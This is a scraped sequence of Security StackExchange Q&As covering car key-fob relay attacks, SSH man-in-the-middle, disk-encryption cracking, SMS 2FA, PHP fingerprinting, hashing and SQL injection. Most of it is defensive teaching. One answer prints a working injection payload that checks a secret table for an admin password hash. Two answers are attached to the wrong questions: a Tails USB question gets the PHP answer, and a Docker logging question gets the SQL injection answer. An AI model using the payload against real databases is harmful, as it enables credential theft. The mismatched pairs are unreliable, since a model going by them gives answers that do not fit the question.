RFC 4226 (HOTP) would still be vulnerable to replay attacks in some situations. In the case of old fashioned key fobs, where you have to press a button to unlock the car, imagine someone who has brief access to the key fob while you are out of range of the car. The attacker can press the button once, record the code transmitted by the fob, and then hurry out to your car, replay the recorded code, and gain access to the vehicle. Another attack possible on this is the RollJam attack and requires only a $32 device. The device is hidden near the vehicle. When the owner comes by and unlocks the car, the signal sent by the fob is recorded by the device and jammed so the car does not unlock. The owner, naturally, tries again. The signal is recorded and jammed again, but the first signal is then replayed. The car receives the replayed signal and unlocks. Meanwhile, the second signal has still not been seen by the car so it can be used to unlock the car once the owner leaves. Modern keyfobs are designed to be passive so that you don't have to press any button for unlocking the car. As long as the fob is in your pocket, the car will unlock itself when you walk up to it and lock itself when you walk away, no interaction required. Now if you use HOTP in this case, well then all the attacker has to do is pretend to be the car and request a code while you are out of the car's range. Then record the code, go back to the car, replay it and profit. And then there is a DOS vulnerability. Since an attacker can request as many HOTP codes as they want, they can make the internal HOTP counter of the fob drift so far away from the counter in the car, that the fob will no longer be able to authenticate. (Actually, this can be an issue with normal fobs too. What happens if your child starts playing with it and presses the unlock button hundreds of times?) In fact, modern keyless fobs take a lot of effort to secure. Early manufacturers decided to implement proprietary challenge-response mechanisms. A cryptographically secure challenge response system, what could go wrong? Well, guess what the car thieves did? They simply amplified the signals transmitted by the vehicle and the fob to make the challenge-response mechanism work over much larger distances than it was meant to. So your BMW is parked outside your house and you are snug in bed having a good night's sleep. Someone walks up to your window with a special device. The device relays an amplified challenge from your car to the key fob in your room. The fob thinks the car is nearby, so it computes the response and transmits it back. The device amplifies the response so it reaches the car, and BOOM, when you wake up in the morning, your shiny new BMW is gone. So then, the manufacturers had to apply further security measures, like measuring the time it took for the key fob to respond. If it took too long to receive the response, the car would conclude that the fob was out of range. But I guess the car manufacturers have learnt their lesson by now and have more robust security (or perhaps not ).
{ "source": [ "https://security.stackexchange.com/questions/250025", "https://security.stackexchange.com", "https://security.stackexchange.com/users/258392/" ] }
251,125
At my university, we are learning how to use SSH for server administration. We learned that SSH is secure, but there are some tools that allow man-in-the-middle attacks on SSH. How can such tools intercept SSH when it is encrypted? I have tried Wireshark but was not able to read the data. Wireshark is only able to read the plain text parts of the SSH protocols. How does a man-in-the-middle attack on SSH work? The mitm tool ( https://github.com/ssh-mitm/ssh-mitm ) allows a second shell to connect to the same SSH session. I have tried it and was able to work in both shells. Are both sessions the same, or how else can this work? I thought that the encryption should protect me from such an attack. Reading the docs ( https://docs.ssh-mitm.at ) does not provide more info on how such an attack works. The docs only explain how to use the tool. This is the reason why I'm asking the question. Can anyone explain in depth how such an attack works? How is it possible that the same SSH session can be used from 2 different clients?
The basic point of a MITM attack against SSH or SSL/TLS is that the connection is no longer end-to-end encrypted, i.e. from client to server. Instead there is an encrypted connection between client and attacker and a different encrypted connection between attacker and server. Since encryption is terminated by the attacker this way, the attacker has access to the full decrypted traffic: Secure: [Client] <---------- End-to-End Encrypted ----------------> [Server] MITM: [Client] <-- Encrypted#1 --> [Attacker] <-- Encrypted#2 --> [Server] Note that this only works if the client does not check the cryptographic identity of the server (server key) and the server does not check the cryptographic identity of the client (client key, which is optional). If any of these are checked an MITM attack is impossible since the attacker cannot impersonate the server or client without having access to their secret key.
{ "source": [ "https://security.stackexchange.com/questions/251125", "https://security.stackexchange.com", "https://security.stackexchange.com/users/259557/" ] }
251,176
I use Fedora Linux and was recently looking into doing Full Disk Encryption on data drives such as /home on some of my / my family's PCs. I understand that LUKS security will be partially dependent on having strong passwords and not doing very obviously stupid things (saw some articles where people were auto-unlocking an encrypted /home partition during boot by passing a keyfile located on an unencrypted / filesystem - which anyone with a livedisc could also use those to open the LUKS container). The main reason why I am concerned was that while googling various things about LUKS / its settings, I came across this Elcomsoft article which talks about breaking LUKS encryption. If that wasn't bad enough, I also saw they had a similar article about breaking Veracrypt ... so I am at a loss as to what I should use for FDE. I admit that most of the infosec stuff is over my head. But I'm still not clear if I can make those solutions secure merely by tweaking settings/algorithms/etc or if the flaw was with something in the projects themselves (I thought it sounded like the latter). On the one hand, the article itself says that LUKS can be viewed as an exemplary implementation of disk encryption But the scary part is in the "Breaking LUKS Encryption" sections and how they make it sound like it is very easy to do with their software. Trying to google was likewise unhelpful as all of the information I could find on "how secure is LUKS?" etc either talked generically about the underlying crypto algorithms or was dated before the Elcomsoft articles. But my reasoning is that in this day and age, it is probably a bit naive to assume that all thieves that might "smash-and-grab" a PC or hard drive from someone's home are going to be technical neophytes. The cheaper of the 2 products mentioned in the LUKS article appeared to be $300 USD. Not chump change but also not unaffordable by any stretch if someone really wanted to get in. My initial guess based on these is that FDE with LUKS/Veracrypt would still be "better than nothing", but if I was unlucky and tech-savvy thieves nabbed my PC then data like Tax Records etc might not be protected. Likewise, anything I had almost certainly would not be protected from government entities or law enforce if they have access to the Elcomsoft products or similar software. Assuming I don't piss off anyone in power, the most I probably have to worry about from the "gov'mint" is saving memes or maybe keeping an offline copy of a few youtube videos... but it is troubling to think that it is so easy for FDE to be defeated. Am I reading this wrong / is it just sales "spin" from Elcomsoft trying to market their product? If it is as easy to defeat as they make it sound, then can anything be done on the end user end to better protected against? If so, what / how? When I see things like Up to 10,000 computers and on-demand cloud instances can be used to attack a single password with Elcomsoft Distributed Password Recovery. The first thing that goes through my head is to wonder if I can configure LUKS to only allow at most X attempts per minute, with X as some small number like 3 . But AFAIK this option does not exist and is nothing more than a dream...
No, Elcomsoft cannot break LUKS or Veracrypt. What they do is to guess the password . Any password-based encryption mechanism can be broken by guessing the password: this is not a flaw in the encryption software. Encryption software can and should mitigate the risk of guessing by making it costly . Both LUKS and Veracrypt do it securely (at least with default settings, it might be possible to weaken the settings if you misconfigure them). They can't completely elimintate the risk of password guessing or snooping because by design, if the adversary figures out what the password is, they will be authorized. You can protect yourself by using a password that has a high enough entropy . (See Confused about (password) entropy , Calculating password entropy? , Password entropy in layman's terms , How can I create a secure password? , …) Note that length helps entropy, but is not enough: a long password can be weak (for example, the first line of a well-known song would make a bad password). Special characters contribute very little to entropy and are counterproductive . A high-entropy password must be randomly generated: humans are very bad at generating entropy. Diceware is popular, though actually using dice rather than using a computer for the random generation isn't actually more secure (except in extremely rare, usually made-up circumstances). If you can't remember a strong enough password, you can store it (or a password-equivalent key file) on removable storage. Of course, there's then the risk of losing the device containing the key file. Or you can use a TPM and bind the encryption key to that TPM, which carries the risk of not being able to access the data if your motherboard breaks.
{ "source": [ "https://security.stackexchange.com/questions/251176", "https://security.stackexchange.com", "https://security.stackexchange.com/users/259634/" ] }
251,530
I have recently had an active website that was protected by an SSL certificate. The site is no longer active and the certificate has expired. I have tried to put up a simple HTML holding page but Google will not show it because there is an expired certificate associated with the domain. Is there a solution to allow me to display the page without needing a certificate.
It sounds like your site may have been serving a HSTS header during the time when it was secured with the SSL certificate. If you are not familiar with HSTS, see https://en.wikipedia.org/wiki/HTTP_Strict_Transport_Security . In particular: It allows web servers to declare that web browsers (or other complying user agents) should automatically interact with it using only HTTPS connections and HSTS Policy specifies a period of time during which the user agent should only access the server in a secure fashion. If that's the case, then Browsers that previously connected to your site by https will be not be able to connect to your site by http until the HSTS directive expires. Browsers that never connected to your site previously will be able to connect to your site by http now. Having said that, SSL has never been simpler and less expensive to deploy (especially if you use Let's Encrypt). You might want to simply renew your SSL certificate to solve the problem of (1) above.
{ "source": [ "https://security.stackexchange.com/questions/251530", "https://security.stackexchange.com", "https://security.stackexchange.com/users/226083/" ] }
251,533
In classic hosting we have a virtual machine with limited resources allocated by hosting provider for running our web application. But with serverless code such as AWS Lambda or Azure Functions, our code is executed by hosting provider (Amazon or Microsoft) itself in response to events. Theoretically speaking, there is no limit for resources that will be allocated to a Lambda function, so doesn't that mean if attacker wanted to take down a serverless app with DDoS he would have to first take down entire AWS/Azure which is just impossible?
There is always something that will break While, theoretically, serverless systems can scale up your application to very high levels, there is always something that will break. Likely candidates: Your database! Other internal services 3rd party services you call while responding to requests Your bank account Even with a stateless endpoint that doesn't use a database or external services, a large-scale DDoS attack can still run up such a large bill from your cloud provider that you chose to shut off the service until the DDoS attack ends. It's not a new concept. Here's a discussion about it: https://summitroute.com/blog/2020/06/08/denial_of_wallet_attacks_on_aws/
{ "source": [ "https://security.stackexchange.com/questions/251533", "https://security.stackexchange.com", "https://security.stackexchange.com/users/255548/" ] }
251,685
I have a vulnerable test site up that runs PHP. How can an attacker identify that PHP is used? if I type .../add.php the site gives back an error message, although the file is add.php . If I type .../add the site runs. Maybe I can inject code to identify PHP? Or is it impossible to check for PHP (including version) if a site is well coded? Here is the code for the test site: Elastic Beanstalk + PHP Demo App
There is no method that is guaranteed to work. The way PHP works is that the HTTP server receives the HTTP request, identifies that it's meant to be PHP and relays the request to the PHP module. This could either be a module built into the web server or be a dedicated "PHP server". The server then checks which PHP code is meant to be executed with which parameters, then executes it, generates a result and relays that result back to the HTTP server, which returns it as HTTP response. Whether or not this process occurs, or whether or not the result received stems from a static page or any number of processes, is unknown to the user. However... There are a number of possible ways PHP could "reveal" itself. The first and most obvious is the X-Powered-By HTTP response header. PHP likes to advertise itself, and so in some installations, the X-Powered-By header is set, which includes that the site is running PHP and which version. There is also a very strange " easter egg " in PHP, which returns specific information such as credits to the development team or the PHP logo, when a specific query string is sent. This behavior can be disabled in the configuration, so it isn't foolproof either. If it works, then it's overwhelmingly likely to be a PHP installation, but if it doesn't, you can't exactly deduce that it's not a PHP installation. Absence of evidence isn't evidence of absence, afterall. Stack traces and other PHP errors, such as this beautiful masterpiece taken from this question , can be an indication as well: Of course, all of these methods only work because of some misconfiguration. On a properly configured server, it is not possible to know for sure if PHP is used or not.
{ "source": [ "https://security.stackexchange.com/questions/251685", "https://security.stackexchange.com", "https://security.stackexchange.com/users/255454/" ] }
251,694
Compared to a DVD live Tails Linux, how unsafe is using the USB version? I'm trying to help a friend who for years has been mired in the laborious iterative process of remastering their own DVDs of Knoppix in the name of security. The use case: Tails Linux Only used in own laptop with no other users No HD, but does have RAM, Intel CPU, GPU, etc. Supply chain assumed safe for now Laptop considered unsafe as soon as it connects to the internet Only online banking and email No use of Tails Persistent Storage Research: Bad/Evil USB articles HW-switch locked USB flash, MBR can still be accessible user comments Tails Persistent Storage risks page Tails known limitations page Searching security.stackexchange Conclusion so far: USB is definitely unsafe (if I had to say 'safe' or 'unsafe') However, I don't know what level of effort would be required to compromise it in this use case. Are we a few years away from such scale and automation or is it already here? State-actor only? Would it be equally bad to have a DVD drive in the computer where the firmware could be compromised? Is this level of scrutiny ridiculous or not out of the question of mass automated infection or surveillance technology?
There is no method that is guaranteed to work. The way PHP works is that the HTTP server receives the HTTP request, identifies that it's meant to be PHP and relays the request to the PHP module. This could either be a module built into the web server or be a dedicated "PHP server". The server then checks which PHP code is meant to be executed with which parameters, then executes it, generates a result and relays that result back to the HTTP server, which returns it as HTTP response. Whether or not this process occurs, or whether or not the result received stems from a static page or any number of processes, is unknown to the user. However... There are a number of possible ways PHP could "reveal" itself. The first and most obvious is the X-Powered-By HTTP response header. PHP likes to advertise itself, and so in some installations, the X-Powered-By header is set, which includes that the site is running PHP and which version. There is also a very strange " easter egg " in PHP, which returns specific information such as credits to the development team or the PHP logo, when a specific query string is sent. This behavior can be disabled in the configuration, so it isn't foolproof either. If it works, then it's overwhelmingly likely to be a PHP installation, but if it doesn't, you can't exactly deduce that it's not a PHP installation. Absence of evidence isn't evidence of absence, afterall. Stack traces and other PHP errors, such as this beautiful masterpiece taken from this question , can be an indication as well: Of course, all of these methods only work because of some misconfiguration. On a properly configured server, it is not possible to know for sure if PHP is used or not.
{ "source": [ "https://security.stackexchange.com/questions/251694", "https://security.stackexchange.com", "https://security.stackexchange.com/users/260350/" ] }
251,881
We have a site that have redirection path like so: http://www.example.com http://www.example.com/ https://www.example.com/ Notice how it goes from http to http first (added a / ), then finally go to https While ideally it should first go to HTTPS before adding a slash, it is what it is now. Moreover, user final destination is HTTPS so my thinking is it should be secure enough. I would like to know if the above step would potentially raise any security concerns, and see if hardening is needed. Cheers!
http://www.example.com http://www.example.com/ There is actually no difference between these from the perspective of the browser and HTTP protocol. A URL consists (among others) of a protocol ( http:// ), a hostname ( www.example.com ) and a path. An empty path is not possible and both of the URL shown use the path / . So there is no actual redirect between these URL since these are equivalent already. For more on this see the HTTP standard, specifically RFC 7321 section 5.3.1 : "If the target URI's path component is empty, the client MUST send "/" as the path within the origin-form of request-target." . Note that this only applies to http://example.com vs. http://example.com/ , i.e. empty path vs. / . With a path of /foo vs. /foo/ it is different since these will actually result in different requests. Moreover, user final destination is HTTPS so my thinking is it should be secure enough. Since the initial request and response are still done via plain HTTP, they are not protected against manipulation by a man in the middle. For example the response could be modified or a new response injected to direct the client to a different final URL. This actually happens, see for example Internet Provider Redirects Users in Turkey to Spyware: Report . In other words: every clear text redirect is one too much. To reduce this attack vector further use HSTS .
{ "source": [ "https://security.stackexchange.com/questions/251881", "https://security.stackexchange.com", "https://security.stackexchange.com/users/173679/" ] }
251,886
I am currently trying to get an understanding of multi factor authentication. The biggest issue so far: When does "something you have" NOT get reduced to "something you know"? I want to have a "posession"-factor that does not get reduced to a "knowledge'-factor I don't think this is a question that can be answered easily, but it would be very helpful if at least the following questions are answered: When I write down or store a password, is this then considered something I have? When I have a public/private RSA-keypair with 4096 bit and I remember the private key without storing it anywhere, is it something I know? When I write down or store the private part of a public/private RSA-keypair with 4096 bit, is this then considered something I have? As far as I understand it "something I have" should be something I have physical access to that nobody else has. I don't see how it is possible to prove that I have something when using a web application because everything gets reduced down to the bits sent in a request and everyone could send the same bits. How does sending a specific sequence of bits prove that I have physical access to a certain device?
When I have a public/private RSA-keypair with 4096 bit and I remember the private key without storing it anywhere, is it something I know? Yes. When I write down or store the private part of a public/private RSA-keypair with 4096 bit, is this then considered something I have? No. The authentication factor is not the sheet of paper where the key was written down, but it is the key written down. The key is not intrinsically connected to the paper, it can live without. This is different from a smartcard or hardware token which contains the key. These devices are designed so that the key cannot be extracted and the device cannot be simply copied, i.e. the key basically has a single physical manifestation. How does sending a specific sequence of bits prove that I have physical access to a certain device? Take your case of a RSA key pair: In case of a smartcard the private key is located on the card and only there. One cannot extract the key but one can ask the smartcard to sign something using this private key - since the smartcard is a tiny computer. Thus the server can send some challenge, the smartcard signs the challenge and the server can verify the challenge using the public key associated with the user. If the signature matched the client must had access to the smartcard, i.e. proved possession of the smartcard. Other hardware based tokens work the same way: the secret never leaves the hardware.
{ "source": [ "https://security.stackexchange.com/questions/251886", "https://security.stackexchange.com", "https://security.stackexchange.com/users/248179/" ] }
251,923
Let's say I have to leave my computer unattended and turned off for a while with some strangers, is it possible for someone to clone my HDD and SSD data?
Nothing On a bit-level, nothing stops an attacker with local access from copying the bits on your hard drive or SSD. In fact, there is hardware designed to create exact images of disks and SSDs, though this is usually done for forensic purposes. How useful those bits are depends on how your hard drive is set up. Without any encryption applied, the attacker can use the filesystem present on the disk image to read the files - just how your computer would do it. Even without an intact filesystem, techniques like "file carving" can be used, where common headers for files are searched. Basically, you look for something that looks like the beginning of an image, and then attempt to read the next sectors as if they were an image. And in the end, you may end up with a usable image, or junk. This can be protected against with encryption . Generally, there are two kinds of common encryption methods: File-based encryption and full-disk encryption. File-based encryption means the contents of some files are encrypted, and full-disk encryption means everything on the whole volume is encrypted. With both of these, the problem now becomes key management. For full-disk encryption solution like BitLocker, keys can be generated with a passphrase and an additional TPM component. For file-based encryption, as it is used on modern Android phones , you can either use a similar approach, or use individual keys for each file, depending on your requirements.
{ "source": [ "https://security.stackexchange.com/questions/251923", "https://security.stackexchange.com", "https://security.stackexchange.com/users/260672/" ] }
252,015
I read this blog ( cached version ) (and the related cached tweet ) about replacing TCP/IP with blockchain. Tweet: The Internet has a serious fundamental flaw: the transmission control protocol/internet protocol (TCP/IP)—the primary engine underpinning the Internet—is less secure. Is #blockchain the solution we need to eliminate this flaw? Blog snippet: Blockchain can eliminate the TCP/IP’s fundamental security flaws. An important value of using Blockchain is allowing users—particularly those who do not need to trust one another—to share valuable information securely and transfer value in a tamper-proof manner. This is because Blockchain stores data using complex cryptography and extremely difficult protocols for attackers to manipulate. ... Blockchain technology provides a secure and immediate way of transmitting digital assets from anywhere in the world to anyone in the world. But I see a lot of people are saying it's not a good replacement. But I don't understand why exactly? What are the reasons?
Blockchain is a distributed ledger. Because everyone has a copy of the data, and those copies can be verified and protected by some very clever algorithms, it makes the data stored on them reliable and secure. But "replace TCP/IP with blockchain" is a meaningless, nonsense, and click-baity phrase. TCP/IP is a transport protocol. Blockchain runs on top of TCP/IP. So, it's like saying "Roads are dangerous and not designed for personal safety. Cars have all these safety features. We should replace roads with cars." Blockchain is a distributed ledger. Who is getting a copy of all this data meant for a single party? So, it's like saying "Phones can be tapped. We should give everyone bullhorns." Sure, you can encrypt the data sent, but you then have to justify this encryption over top of and in relationship to TLS. It's not that blockchain is "not a good replacement", but rather, without quite a lot of explanation and context, it's a play at sounding cool and like one has some earth-shattering idea to use a hyped-up, over-promised technology. It's the sort of idea a couple of drunk people come up with at 2am and write on the back of a napkin. Most people see the ramblings the next day and have the good sense to throw the napkin out. Alas, this author decided to use it as a pitch to RSA to drive clicks... By the way, the author of the article in question claims to be "a 30-year veteran in the blockchain and DeFi space ..." It would appear that he wrote his bio at 2am, too...
{ "source": [ "https://security.stackexchange.com/questions/252015", "https://security.stackexchange.com", "https://security.stackexchange.com/users/257610/" ] }
252,076
I did some research about how secure and private SMS messages are. Providers and governments can see these SMS messages in plaintext, but what is weird is that these messages are not encrypted in transit. According to my knowledge, that makes the service vulnerable to MiTM attacks: a semi-skilled hacker who knows my location can intercept the connection and get a code to reset my Google account's password for example.
Yes, you're right. SMSes are not recommended in any two-factor authentication (2FA) process nowadays. They can be easily intercepted and modified. That's why a lot of companies are recommending other alternatives: Why 2FA SMS is a Bad Idea Top 5 reasons not to use SMS for multi-factor authentication Do you use SMS for two-factor authentication? Here's why you shouldn't SMSes are considered obsolete when talking about a secure way to verify your identity. They are also affected by SIM Swapping attacks . That's why some 2FA apps that use TOTP , like "Google Authenticator", are gaining more popularity in the market. There are many examples on the Internet exploiting these weaknesses: I hacked my friend’s website after a SIM swap attack A Step by Step Guide to SS7 Attacks SS7 hack explained: what can you do about it? Exploit SS7 to Redirect Phone Calls/SMS SMS: The most popular and least secure 2FA method SMS spoofing attack vector Even with all these examples, SMSes are still used because: The infrastructure for SMSes is already implemented worldwide and changing it would be really expensive. They are a relatively easy and cheap way to implement 2FA. They can be used without special software / apps in any cellphone. For old cellphones, this may be the only way to receive a 2FA code. But no matter what technology are you using, attackers always take advantage of the weakest link, in this case, people, so they will use social engineering techniques to try to trick you so you end up sending the 2FA code to them.
{ "source": [ "https://security.stackexchange.com/questions/252076", "https://security.stackexchange.com", "https://security.stackexchange.com/users/260902/" ] }
252,103
No idea where to begin, I would like to ask for tips, direction and approaches when it comes to performing such a web testing. Source code analysis is not within scope for this test. I intend to run scanning tools (nmap, nikto, etc) on the website's server.
For a static web application there are things you should and shouldn't consider (this is non exhaustive): For should: Directory traversal: Is there any directories you can access? Were these intended? Inspect elements: Did the developer or similar leave any comments in the client side returned HTML? Server version: Despite being static something still needs to host it! Is the nginx/apache out of date? Host Setup: Does the host go to a domain name (trust) and are ports restricted to what is absolutely necessary? SSL Certificate:(Corrected) Although there is minimal value in HTTPS on a static site, it is a baseline requirement for 2021. See here . For shouldn't: Injection: If it is static, there should be nowhere to inject. Access Management: No handling of accounts. If I was in readers position, I would confirm the application is static, write a minimal report, and deliver quick. I would encourage the reader to apply the Web Security Testing Guide (WSTG) to what they are doing, only picking the applicable testing steps.
{ "source": [ "https://security.stackexchange.com/questions/252103", "https://security.stackexchange.com", "https://security.stackexchange.com/users/257055/" ] }
252,446
My knowledge about these topics is very elementary, please "school me" if I said something completely wrong, it would surely help me understand these things better. Now, to my issue. Now that I have a laptop and didn't encrypt the entire disk during installation I was looking for ways to encrypt some particular folder or files. I found two different ways to protect the files but I don't grasp the difference between the two: password and a pair of public/private key. Option 1: I encrypt a file and to decrypt it I have to insert a password, I'm ok with that and understand it. Option 2: I want to instead use a pair of public/private keys. So I generate the pair and I encrypt the file with the public key. At this point, when I create the private key, I should password protect it, otherwise anyone that has access to my laptop can access and use the key and be therefore able to decrypt the file. So what's the point of using a private key instead of a password if the private key itself is password protected? Why wouldn't I want to straightforwardly use option 1? Sorry for my lack of understanding about these topics, feel free to explain it to me like I'm 5.
The two options are intended for different use cases. Option 1 is intended for your use case. It encrypts the file with a key derived from a password, so that only the person who knows the password (i.e. most likely the person who encrypted it in the first place) can decrypt it. Option 2 is designed so you can share encrypted files/messages with others. The idea behind it is that you can encrypt the file to someone else's public key, send them the encrypted file, and they (an only they) can decrypt it, without the need of establishing a pre-shared secret password/key between the two of you. Additionally, you can sign the file with your own private key, so that the recipient can confirm that the file did indeed come from you. Of course, you can use this system to encrypt the file to your own key, but as you point out, you would still need a password to decrypt your own private key before decrypting the file (and it would add some (usually negligible) extra computational overhead). Some people might prefer to use this method for encrypting their own files, since it means that, instead of maintaining both systems, they can use the same system for both use cases.
{ "source": [ "https://security.stackexchange.com/questions/252446", "https://security.stackexchange.com", "https://security.stackexchange.com/users/261412/" ] }
252,464
I have an SQL query like "select * from records where record like '%" + user_input + "%'" My goal here is to get all the records. So far everything I have tried involves using comments to bypass the whitespace filter, but with / and - disabled that did not work. Does this mean my SQL query is safe? Is there any way someone can break my query and view all the records?
Does this mean my SQL query is safe? Is there any way someone can break my query and view all the records? No, it is not safe. More than being able to view all the records of one table, you can pass in: "'AND(EXISTS(SELECT(1)FROM"SECRET_TABLE"WHERE((username='Admin')AND(password_hash='0123456789ABCDEF'))))AND"RECORD"LIKE'" If you get any output then you know that: There is a table called SECRET_TABLE ; That table has the columns USERNAME and PASSWORD_HASH ; and There is a row where the username is Admin and the password hash is 0123456789ABCDEF . And the passed in expression does not use the -*|%/ characters or any whitespace and results in a valid SQL expression. db<>fiddle here A determined attacker could then use this type of query to pull out data from any table the connected user has access to. Don't use string concatenation to include user input into queries; use prepared statements with parameters. For example: "SELECT * FROM table_name WHERE RECORD LIKE '%' || ? || '%'" And pass your dynamic value in as a bind parameter.
{ "source": [ "https://security.stackexchange.com/questions/252464", "https://security.stackexchange.com", "https://security.stackexchange.com/users/-1/" ] }
252,492
I have an AWS EC2 instance with docker installed, running a default nginx container - docker run -it --rm -d -p 8080:80 --name web nginx . I have an rsyslog setup that successfully captures the auth.log file for the host, so I can capture any login attempts to that machine. However, I'm wondering if there is any way I can capture container login attempts, i.e if someone gains access to the machine and runs docker exec -it web bash . While the container is running, docker logs outputs anything the container is logging to stdout/err. But I haven't found any documentation on container login attempts. Is docker exec the correct way to try "logging in" to the container? Is this something I can feasibly capture? Does it make sense to? When I run docker exec I haven't seen it logged anywhere - host syslog, kernel.log, auth.log, docker logs , nothing at all. So, it doesn't seem like container "logins" are even captured anywhere, and as long as the container is not running with privileged access (as USER root), there is minimal risk. It seems that protecting the host is far more important. More generally, if anyone is in the container poking around, running commands that require root etc., is this logged anywhere on the host? Or do I need to configure rsyslog in the container in order to capture such events. Any insight would be greatly appreciated!
Does this mean my SQL query is safe? Is there any way someone can break my query and view all the records? No, it is not safe. More than being able to view all the records of one table, you can pass in: "'AND(EXISTS(SELECT(1)FROM"SECRET_TABLE"WHERE((username='Admin')AND(password_hash='0123456789ABCDEF'))))AND"RECORD"LIKE'" If you get any output then you know that: There is a table called SECRET_TABLE ; That table has the columns USERNAME and PASSWORD_HASH ; and There is a row where the username is Admin and the password hash is 0123456789ABCDEF . And the passed in expression does not use the -*|%/ characters or any whitespace and results in a valid SQL expression. db<>fiddle here A determined attacker could then use this type of query to pull out data from any table the connected user has access to. Don't use string concatenation to include user input into queries; use prepared statements with parameters. For example: "SELECT * FROM table_name WHERE RECORD LIKE '%' || ? || '%'" And pass your dynamic value in as a bind parameter.
{ "source": [ "https://security.stackexchange.com/questions/252492", "https://security.stackexchange.com", "https://security.stackexchange.com/users/256267/" ] }
252,554
I am trying to understand the security problems when working with a game that needs an account for its players. What is the problem of using a self-signed certificate? If I understand the problem correctly, it's just that if the server private key is compromised, the users will still trust the certificate and the guy that stole the key could steal their passwords. (Until the game updates with the new certificate.) But is that the only problem? And if it is, is it really possible for an attacker to steal the private key from a server with intensive firewalls (just open as few ports as possible?). Here is what I have in mind for my game when a client wants to authenticate: The client encrypts it's username and password with RSA using the public key of the self signed-certificate. The client sends this encrypted message to the server. (So here technically only the master server could read the messages, except if the self-signed certificate is compromised) The server reads the message using it's private key from the self-signed certificate Then here the server do classic things, checks in the database if the username exists then hashes the password with something like bcrypt and checks if the password is correct, then he set the client in the authenticated state and now have access to other features like joining game servers, accessing the servers list etc... And basically I need to make the clients trust the public key! Because if the master server send it's public key to the client then a man in the middle could take it, generate itself a public/private key and send it's public key. So now the client could think he talks to the server but instead he talks to the man in the middle. Am I thinking wrong?
You don't seem to understand the issue with self-signed certificates, so allow me to explain. Generally, when people say "Don't use self-signed certificates!", they mean in the context of a web-server, in which you expect the general public to connect via a web browser. In such a situation, if a self-signed certificate is used, this will lead to an error message: Users will naturally want to ignore the warning and proceed - after all, that's the only way for them to use your website. So if an attacker intercepts the connection and presents his own self-signed certificate, the user would not be able to see that. After all, the error message is seen as a natural part of the process. Self-Signed Certificates in other settings Companies usually have a self-signed certificate as a root-certificate for internal services. This certificate is distributed internally (usually via Active Directory) and thus trusted by all clients. This is a normal setup and works as intended. If an attacker would attempt to intercept the connection, an error would occur, as his certificate would not be trusted. Self-Signed Certificates for your game I assume that you have a server, which manages the game state, and a game client (likely a native client). In this situation, there is nothing wrong with using a self-signed certificate. Simply distribute the certificate with the client and keep the private key on the server. Can the attacker just steal the private key? Only if your server has a vulnerability, which would allow the attacker to do so. But that risk would also exist with a certificate signed by an external certificate authority.
{ "source": [ "https://security.stackexchange.com/questions/252554", "https://security.stackexchange.com", "https://security.stackexchange.com/users/261592/" ] }
253,771
When it comes to hashing passwords, it is nowadays practice to do 100'000 or 200'000 iterations of SHA256/SHA512, or at least something in that ballpark. But my question is, why is it not safe enough to just do a very small but unusual number of iterations that is unlikely to be guessed? For example, let's say I use 153 iterations of SHA512 to hash the user passwords. Now a hacker breaches the database and steals all password hashes. They will never guess that I'm using exactly 153 iterations and they don't have access to the source code, also nobody will have created a lookup-table for 153, or 267, or 1139 rounds of SHA512 password hashes, correct? (Though lookup-tables are useless anyway if the passwords are salted before hashing)
The idea of a large number of iterations is not to be part of the secret, but to take more time. Having a database with a large number of passwords means someone will have a weak password, and it's trivial to test the dictionary of worst 100k passwords in minutes, no matter if you are using 200k iterations, or 153 as you are using. A dedicated password cracking device from 2018 achieved 9392.1 MH/s (mega hashes per second) doing SHA256, so trying 100 worst passwords from 1 iteration to 200,000 iterations would take the attacker just seconds to deduce how many rounds you are using. And that goes all your secrecy. That's why you don't use SHA or MD5 for password storage: they are fast hashes. They are very good for checking the integrity of a download, or the data on Bitcoin blockchain, but not for password storage. And you should use a tunable hash for that, like Argon2 (as CBHacking reminded me). Compare the 9392.1MH/s for SHA256 with 43551 H/s for BCrypt with Blowfish, and 124 H/s for Veracrypt PBKDF2-HMAC-Whirlpool + XTS 512 bit. It's not practical to do a dictionary attack with a large sized dictionary against a decent configured Argon2 password database. The main point of the password hashing algorithm is that you can tune them to be as slow as you want without committing a self-inflicted DoS. If you put so many rounds that it takes 10 seconds for your server to process a login request, an attacker can hammer your server with login requests with bogus passwords and essentially kill it.
{ "source": [ "https://security.stackexchange.com/questions/253771", "https://security.stackexchange.com", "https://security.stackexchange.com/users/227148/" ] }
253,868
If so, is trying to exploit through a time-based injection enough to prove there's a vulnerability in said site?
As stated, the answer to the question is "certainly not", HTTP 500 Internal Server Error is used by pretty much every web server in the world for any uncaught exception, which could be anything from a divide-by-zero to a null pointer dereference to an out-of-memory. It could even be from a database connection without meaning there's a SQLi vulnerability; maybe the developer has a typo in their procedure name or a function sometimes tries to insert a null in a non-optional column. In the specific case that you were attempting SQLi against the server, it's certainly evidence. You'd still want to verify it in a few ways (do queries without any SQL metacharacters always work? Do those with metacharacters always either fail or "work" in a way consistent with the injection?) but it's probably worth trying a few more things, including time-based attacks. However, if a time-based attack attempt just returns a 500 without actually delaying or anything, then you haven't succeeded in an attack, you've just sent a request the developer didn't anticipate and handle correctly by sending a 400 instead. If you want to prove there's a vulnerability, you have to actually exploit it. Get an actual delay, or return an extra value, or log in as the wrong user, or insert spurious data, or whatever. HTTP 500 is literally just "an unspecified error occurred" and doesn't prove anything at all (maybe a passing cosmic ray flipped a bit that caused the exception and it didn't have anything to do with your request at all...). EDIT: Since apparently this isn't clear: a server can also return 500 Internal Server Error (or anything else) in response to any request, at the whim of its programmer. It's just bits on a wire, data sent by a program to a network socket. The spec says it's a catch-all for errors where something went wrong while processing the request and it wasn't a recognized client error, and it's the default response when there's an uncaught exception (though that too can be overridden), but web developers sometimes send it for other situations too.
{ "source": [ "https://security.stackexchange.com/questions/253868", "https://security.stackexchange.com", "https://security.stackexchange.com/users/264122/" ] }
254,101
